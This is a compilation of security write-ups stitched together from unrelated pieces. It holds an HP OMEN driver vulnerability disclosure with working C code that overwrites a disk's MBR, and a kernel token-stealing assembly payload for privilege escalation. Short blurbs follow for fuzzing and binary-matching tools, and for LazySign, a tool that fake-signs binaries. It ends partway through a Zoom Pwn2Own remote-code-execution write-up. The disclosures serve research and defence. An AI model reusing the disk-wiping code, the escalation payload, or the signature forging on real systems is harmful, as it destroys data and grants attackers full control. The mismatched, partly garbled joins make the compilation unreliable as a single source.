unsigned char port_byte_in(unsigned short port) {
	return __inbyte(port);
}

void port_byte_out(unsigned short port, unsigned char data) {
	__outbyte(port, data);
}

void port_long_out(unsigned short port, unsigned long data) {
	__outdword(port, data);
}

unsigned short port_word_in(unsigned short port) {
	return __inword(port);
}

#define BASE 0x1F0

void read_sectors_ATA_PIO(unsigned long LBA, unsigned char sector_count) {
	ATA_wait_BSY();
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x20); //Send the read command


	for (int j = 0; j < sector_count; j++) {
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) { USHORT a = port_word_in(BASE); DbgPrint("0x%x, ", a); } } } void write_sectors_ATA_PIO(unsigned char LBA, unsigned char sector_count) { ATA_wait_BSY(); port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x30);

	for (int j = 0; j < sector_count; j++)
	{
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) { port_long_out(BASE, 0xffffffff); } } } static void ATA_wait_BSY() //Wait for bsy to be 0 { while (port_byte_in(BASE + 7) & STATUS_BSY); } static void ATA_wait_DRQ() //Wait fot drq to be 1 { while (!(port_byte_in(BASE + 7) & STATUS_RDY)); } NTSTATUS DriverEntry(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry) { UNREFERENCED_PARAMETER(registry); driver_object->DriverUnload = drv_unload;

	DbgPrint("Before: \n");
	read_sectors_ATA_PIO(0, 1);
	write_sectors_ATA_PIO(0, 1);
	
	DbgPrint("\nAfter: \n");
	read_sectors_ATA_PIO(0, 1);

	return STATUS_SUCCESS;
}

This ATA PIO read/write is based on LearnOS. Running this driver will result in the following DebugView prints:

Debug logging from the driver in DbgView utility

Trying to restart this machine will result in an ‘Operating System not found’ error message because our demo driver destroyed the first sector of the disk (the MBR).

The machine fails to boot due to corrupted MBR

It’s worth mentioning that the impact of this vulnerability is platform dependent. It can potentially be used to attack device firmware or perform legacy PCI access by accessing ports 0xCF8/0xCFC. Some laptops may have embedded controllers which are reachable via IO port access.

Another interesting vulnerability in this driver is an arbitrary MSR read/write, accessible via IOCTLs 0x9C402084 and 0x9C402088. Model-Specific Registers (MSRs) are registers for querying or modifying CPU data. RDMSR and WRMSR are used to read and write to MSR accordingly. Documentation for WRMSR and RDMSR can be found on Intel(R) 64 and IA-32 Architecture Software Developer’s Manual Volume 2 Chapter 5.

In the following image, arbitrary MSR read is marked in green, MSR write in blue, and HLT is marked in red (accessible via IOCTL 0x9C402090, which allows executing the instruction in a privileged context).

Vulnerable code with unauthorized access to MSR registers

Most modern systems only use MSR_LSTAR during a system call transition from user-mode to kernel-mode:

MSR_LSTAR MSR register in WinDbg

It should be noted that on 64-bit KPTI enabled systems, LSTAR MSR points to nt!KiSystemCall64Shadow.

The entire transition process looks something like as follows:

The entire process of transition from the User Mode to Kernel mode

These vulnerabilities may allow malicious actors to execute code in kernel mode very easily, since the transition to kernel-mode is done via an MSR. This is basically an exposed WRMSR instruction (via IOCTL) that gives an attacker an arbitrary pointer overwrite primitive. We can overwrite the LSTAR MSR and achieve a privilege escalation to kernel mode without needing admin privileges to communicate with this device driver.

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACLs enforcements (note: Some drivers handle access to devices independently in IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device
The function that handles IOCTLs to write to arbitrary MSRs

Weaponizing this kind of vulnerability is trivial as there’s no need to reinvent anything; we just took the msrexec project and armed it with our code to elevate our privileges.

Our payload to elevate privileges:

	//extern "C" void elevate_privileges(UINT64 pid);
	//DWORD current_process_id = GetCurrentProcessId();
	vdm::msrexec_ctx msrexec(_write_msr);
	msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void
	{
		const auto dbg_print = reinterpret_cast(get_kroutine(krnl_base, "DbgPrint"));
		const auto ex_alloc_pool = reinterpret_cast(get_kroutine(krnl_base, "ExAllocatePool"));

		dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
		dbg_print("> cr4 -> 0x%p\n", __readcr4());
		elevate_privileges(current_process_id);
	});

The assembly payload:

elevate_privileges proc
_start:
	push rsi
	mov rsi, rcx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]
	
__findsys:
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, 4
	jnz __findsys

	mov rax, rbx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]

__findarg:
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, rsi
	jnz __findarg

	mov rcx, [rax + 4b8h]
	and cl, 0f0h
	mov [rbx + 4b8h], rcx

	xor rax, rax
	pop rsi
	ret
elevate_privileges endp

Note that this payload is written specifically for Windows 10 20H2.

Let’s see what it looks like in action.

OMEN Gaming Hub Privilege Escalation

Initially, HP developed a fix that verifies the initiator user-mode applications that communicate with the driver. They open the nt!_FILE_OBJECT of the callee, parsing its PE and validating the digital signature, all from kernel mode. While this in itself should be considered unsafe, their implementation (which also introduced several additional vulnerabilities) did not fix the original issue. It is very easy to bypass these mitigations using various techniques such as “Process Hollowing”. Consider the following program as an example:

int main() {

    puts("Opening a handle to HpPortIO\r\n");

    hDevice = CreateFileW(L"\\\\.\\HpPortIO", FILE_ANY_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {

        printf("failed! getlasterror: %d\r\n", GetLastError());


        return -1;

    }

    printf("succeeded! handle: %x\r\n", hDevice);

    return -1;

}

Running this program against the fix without Process Hollowing will result in:

    Opening a handle to HpPortIO failed! 
    getlasterror: 87

While running this with Process Hollowing will result in:

    Opening a handle to HpPortIO succeeded! 
    handle: <HANDLE>

It’s worth mentioning that security mechanisms such as PatchGuard and security hypervisors should mitigate this exploit to a certain extent. However, PatchGuard can still be bypassed. Some of its protected structure/data are MSRs, but since PatchGuard samples these assets periodically, restoring the original values very quickly may enable you to bypass it.

Impact

An exploitable kernel driver vulnerability can lead an unprivileged user to SYSTEM, since the vulnerable driver is locally available to anyone.

This high severity flaw, if exploited, could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.

Impacted products:

  • HP OMEN Gaming Hub prior to version 11.6.3.0 is affected
  • HP OMEN Gaming Hub SDK Package prior 1.0.44 is affected

Development Suggestions

To reduce the attack surface provided by device drivers with exposed IOCTLs handlers, developers should enforce strong ACLs on device objects, verify user input and not expose a generic interface to kernel mode operations.

Remediation

HP released a Security Advisory on September 14th to address this vulnerability. We recommend customers, both enterprise and consumer, review the HP Security Advisory for complete remediation details.

Conclusion

This high severity vulnerability affects millions of PCs and users worldwide. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, using any OMEN-branded PC with the vulnerable driver utilized by OMEN Gaming Hub makes the user potentially vulnerable. Therefore, we urge users of OMEN PCs to ensure they take appropriate mitigating measures without delay.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

17, Feb, 2021 – Initial report
17, Feb, 2021 – HP requested more information
14, May, 2021 – HP sent us a fix for validation
16, May, 2021 – SentinelLabs notified HP that the fix was insufficient
07, Jun, 2021 – HP delivered another fix, this time disabling the whole feature
27, Jul, 2021 – HP released an update to the software on the Microsoft Store
14, Sep 2021 – HP released a security advisory for CVE-2021-3437
14, Sep 2021 – SentinelLabs’ research published

Autoharness - A Tool That Automatically Creates Fuzzing Harnesses Based On A Library


AutoHarness is a tool that automatically generates fuzzing harnesses for you. This idea stems from a concurrent problem in fuzzing codebases today: large codebases have thousands of functions and pieces of code that can be embedded fairly deep into the library. It is very hard or sometimes even impossible for smart fuzzers to reach that codepath. Even for large fuzzing projects such as oss-fuzz, there are still parts of the codebase that are not covered in fuzzing. Hence, this program tries to alleviate this problem in some capacity as well as provide a tool that security researchers can use to initially test a code base. This program only supports code bases which are coded in C and C++.


Setup/Demonstration

This program utilizes llvm and clang for libfuzzer, Codeql for finding functions, and python for the general program. This program was tested on Ubuntu 20.04 with llvm 12 and python 3. Here is the initial setup.

sudo apt-get update;
sudo apt-get install python3 python3-pip llvm-12* clang-12 git;
pip3 install pandas lief subprocess os argparse ast;

Follow the installation procedure for Codeql on https://github.com/github/codeql. Make sure to install the CLI tools and the libraries. For my testing, I have stored both the tools and libraries under one folder. Finally, clone this repository or download a release. Here is the program's output after running on nginx with the multiple argument mode set. This is the command I used.

python3 harness.py -L /home/akshat/nginx-1.21.0/objs/ -C /home/akshat/codeql-h/ -M 1 -O /home/akshat/autoharness/ -D nginx -G 1 -Y 1 -F "-I /home/akshat/nginx-1.21.0/objs -I /home/akshat/nginx-1.21.0/src/core -I /home/akshat/nginx-1.21.0/src/event -I /home/akshat/nginx-1.21.0/src/http -I /home/akshat/nginx-1.21.0/src/mail -I /home/akshat/nginx-1.21.0/src/misc -I /home/akshat/nginx-1.21.0/src/os -I /home/akshat/nginx-1.21.0/src/stream -I /home/akshat/nginx-1.21.0/src/os/unix" -X ngx_config.h,ngx_core.h

Results:  

 It is definitely possible to raise the success by further debugging the compilation and adding more header files and more. Note the nginx project does not have any shared objects after compiling. However, this program does have a feature that can convert PIE executables into shared libraries.


Planned Features (in order of progress)

  1. Struct Fuzzing

The current way implemented in the program to fuzz functions with multiple arguments is by using fuzzing data provider. There are some improvements to make in this integration; however, I believe I can incorporate this feature with data structures. A problem which I come across when coding this is with codeql and nested structs. It becomes especially hard without writing multiple queries which vary for every function. In short, this feature needs more work. I was also thinking about a simple solution using protobufs.


  1. Implementation Based Harness Creation

Using codeql, it is possible to use to generate a control flow graph that maps how the parameters in a function are initialized. Using that information, we can create a better harness. Another way is to look for implementations for the function that exist in the library and use that information to make an educated guess on an implementation of the function as a harness. The problems I currently have with this are generating the control flow graphs with codeql.


  1. Parallelized fuzzing/False Positive Detection

I can create a simple program that runs all the harnesses and picks up on any of the common false positives using ASAN. Also, I can create a new interface that runs all the harnesses at once and displays their statistics.


Contribution/Bugs

If you find any bugs with this program, please create an issue. I will try to come up with a fix. Also, if you have any ideas on any new features or how to implement performance upgrades or the current planned features, please create a pull request or an issue with the tag (contribution).


PSA

This tool generates some false positives. Please first analyze the crashes and see if it is valid bug or if it is just an implementation bug. Also, you can enable the debug mode if some functions are not compiling. This will help you understand if there are some header files that you are missing or any linkage issues. If the project you are working on does not have shared libraries but an executable, make sure to compile the executable in PIE form so that this program can convert it into a shared library.


References
  1. https://lief.quarkslab.com/doc/latest/tutorials/08_elf_bin2lib.html


Karta - Source Code Assisted Fast Binary Matching Plugin For IDA


"Karta" (Russian for "Map") is an IDA Python plugin that identifies and matches open-sourced libraries in a given binary. The plugin uses a unique technique that enables it to support huge binaries (>200,000 functions), with almost no impact on the overall performance.

The matching algorithm is location-driven. This means that it's main focus is to locate the different compiled files, and match each of the file's functions based on their original order within the file. This way, the matching depends on K (number of functions in the open source) instead of N (size of the binary), gaining a significant performance boost as usually N >> K.

We believe that there are 3 main use cases for this IDA plugin:

  1. Identifying a list of used open sources (and their versions) when searching for a useful 1-Day
  2. Matching the symbols of supported open sources to help reverse engineer a malware
  3. Matching the symbols of supported open sources to help reverse engineer a binary / firmware when searching for 0-Days in proprietary code

Read The Docs

https://karta.readthedocs.io/


Installation (Python 3 & IDA >= 7.4)

For the latest versions, using Python 3, simply git clone the repository and run the setup.py install script. Python 3 is supported since versions v2.0.0 and above.


Installation (Python 2 & IDA < 7.4)

As of the release of IDA 7.4, Karta is only actively developed for IDA 7.4 or newer, and Python 3. Python 2 and older IDA versions are still supported using the release version v1.2.0, which is most probably going to be the last supported version due to python 2.X end of life.


Identifier

Karta's identifier is a smaller plugin that identifies the existence, and fingerprints the versions, of the existing (supported) open source libraries within the binary. No more need to reverse engineer the same open-source library again-and-again, simply run the identifier plugin and get a detailed list of the used open sources. Karta currently supports more than 10 open source libraries, including:

  • OpenSSL
  • Libpng
  • Libjpeg
  • NetSNMP
  • zlib
  • Etc.

Matcher

After identifying the used open sources, one can compile a .JSON configuration file for a specific library (libpng version 1.2.29 for instance). Once compiled, Karta will automatically attempt to match the functions (symbols) of the open source in the loaded binary. In addition, in case your open source used external functions (memcpy, fread, or zlib_inflate), Karta will also attempt to match those external functions as well.


Folder Structure
  • src: source directory for the plugin
  • configs: pre-supplied *.JSON configuration files (hoping the community will contribute more)
  • compilations: compilation tips for generating the configuration files, and lessons from past open sources
  • docs: sphinx documentation directory

Additional Reading

Credits

This project was developed by me (see contact details below) with help and support from my research group at Check Point (Check Point Research).


Contact (Updated)

This repository was developed and maintained by me, Eyal Itkin, during my years at Check Point Research. Sadly, with my departure of the research group, I will no longer be able to maintain this repository. This is mainly because of the long list of requirements for running all of the regression tests, and the IDA Pro versions that are involved in the process.

Please accept my sincere apology.

@EyalItkin



LazySign - Create Fake Certs For Binaries Using Windows Binaries And The Power Of Bat Files


Create fake certs for binaries using windows binaries and the power of bat files

Over the years, several cool tools have been released that are capeable of stealing or forging fake signatures for binary files. All of these tools however, have additional dependencies which require Go,python,...


This repo gives you the opportunity of fake signing with 0 additional dependencies, all of the binaries used are part of Microsoft's own devkits. I took the liberty of writing a bat file to make things easy.

So if you are lazy like me, just clone the git, run the bat, follow the instructions and enjoy your new fake signed binary. With some adjustments it could even be used to sign using valid certs as well ¯\(ツ)



Zoom RCE from Pwn2Own 2021

On April 7 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had profound experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows. So during this project we had a lot to learn about the Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own pic.twitter.com/qpw7yIEQLS

— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit (now fixed) in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.

Announcement

Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at https://t.co/suCceKxI0T #P2O

— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.

Step 1: What is this “Zoom”?

Both of us had not used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full featured chat client included, with the ability to send images, create group chats, and many more. Within meetings, there’s of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as much as possible of the features.

Step 2: Network interception

The next step was to get visibility in the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat connection itself uses a XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one a custom UDP based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.

In the next DLL’s we hit a bit of a wall. The disassembly of the other DLL’s was almost impossible to get through due to a large number of calls to vtables and other DLL’s. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLL’s do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.

Sadly, Zoom turned this request down - we don’t know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has a SDK that can be used to integrate the Zoom meeting functionality in other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn’t have all of them (some UI related DLL’s are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
    logging::LogMessage::LogMessage
              (local_c8,
               "c:\\ZoomCode\\client_sdk_2019_kof\\client\\src\\framework\\common\\SaasBeeWebServiceModule\\ZoomNetworkMonitor.cpp"
               , 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);
    log_message(uVar3);
    logging::LogMessage::~LogMessage(local_c8);
}

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

  1. The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <thread>gloox{BFE86A52-2D91-4DA0-8A78-DC93D3129DA0}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="SendMessage">
      <msg>
        <message>/fWuV6UYSwamNEc40VKAnA==</message>
        <iv>sriMTH04EXSPnphTKWuLuQ==</iv>
      </msg>
      <xkey>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  </zmtask>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
  </zmext>
</message>
  1. The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).
<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <thread>gloox{25F7E533-7434-49E3-B3AC-2F702579C347}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <zmext>
    <msg_type>207</msg_type>
    <from n="Jane Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</scid>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="RequestKey">
      <xkey>
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTA0MDIxMjAzNDVaFw0yMjA0MDIxMjMzNDVaMEoxLDAqBgNVBAMMI2VrM19mZHZ5dHFnbTB6emxtY25kZ2FAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAa5LZ0vdjfjTDbPnuK2Pj1WKRaBee0QoAUQ281Z+uG4Ui58+QBSfWVVWCrG/8R4KTPvhS7/utzNIe+5R8oE69EPFAFNBMe/nCugYfi/EzEtwzor/x1R6sE10rIBGwFwKNSnzxtwDbiFmjpWFFV7TAdT/wr/f1E1ZkVR4ooitgVwGfREVMA0GCSqGSIb3DQEBCwUAA4IBAQAbtx2A+A956elf/eGtF53iQv2PT9I/4SNMIcX5Oe/sJrH1czcTfpMIACpfbc9Iu6n/WNCJK/tmvOmdnFDk2ekDt9jeVmDhwJj2pG+cOdY/0A+5s2E5sFTlBjDmrTB85U4xw8ahiH9FQTvj0J4FJCAPsqn0v6D87auA8K6w13BisZfDH2pQfuviJSfJUOnIPAY5+/uulaUlee2HQ1CZAhFzbBjF9R2LY7oVmfLgn/qbxJ6eFAauhkjn1PMlXEuVHAap1YRD8Y/xZRkyDFGoc9qZQEVj6HygMRklY9xUnaYWgrb9ZlCUaRefLVT3/6J21g6G6eDRtWvE1nMfmyOvTtjC</pub_cert>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <v2data action="None"/>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
</message>
  1. The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <thread>gloox{24A77779-3F77-414B-8BC7-E162C1F3BDDF}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <recv>[email protected]</recv>
      <rres>ZoomChat_pc</rres>
      <rcid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</rcid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTAyMTgxOTIzMjJaFw0yMjAyMTgxOTUzMjJaMEoxLDAqBgNVBAMMI2V3Y2psbmlfcndjamF5Z210cHZuZXdAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAPyPYr49WDKcwh2dc1V1GMv5whVyLaC0G/CzsvJXtSoSRouPaRBloBBlay2JpbYiZIrEBek3ONSzRd2Co1WouqXpASo2ADI/+qz3OJiOy/e4ccNzGtCDZTJHWuNVCjlV3abKX8smSDZyXc6eGP72p/xE96h80TLWpqoZHl1Ov+JiSVN/MA0GCSqGSIb3DQEBCwUAA4IBAQCUu+e8Bp9Qg/L2Kd/+AzYkmWeLw60QNVOw27rBLytiH6Ff/OmhZwwLoUbj0j3JATk/FiBpqyN6rMzL/TllWf+6oWT0ZqgdtDkYvjHWI6snTDdN60qHl77dle0Ah+VYS3VehqtqnEhy3oLiP3pGgFUcxloM85BhNGd0YMJkro+mkjvrmRGDu0cAovKrSXtqdXoQdZN1JdvSXfS2Otw/C2x+5oRB5/03aDS8Dw+A5zhCdFZlH4WKzmuWorHoHVMS1AVtfZoF0zHfxp8jpt5igdw/rFZzDxtPnivBqTKgCMSaWE5HJn9JhupHisoJUipGD8mvkxsWqYUUEI2GDauGw893</pub_cert>
        <encoded>...</encoded>
        <signature>MIGHAkIBaq/VH7MvCMnMcY+Eh6W4CN7NozmcXrRSkJJymvec+E5yWqF340QDNY1AjYJ3oc34ljLoxy7JeVjop2s9k1ZPR7cCQWnXQAViihYJyboXmPYTi0jRmmpBn61OkzD6PlAqAq1fyc8e6+e1bPsu9lwF4GkgI40NrPG/kbUx4RbiTp+Ckyo0</signature>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
</message>

The way the key is encrypted has two options, depending on the type of key used by the recipient’s certificate. If it uses a RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but to use an elliptic curve key using the curve P-521. Algorithms for encryption using elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Helman is used using both users’ keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

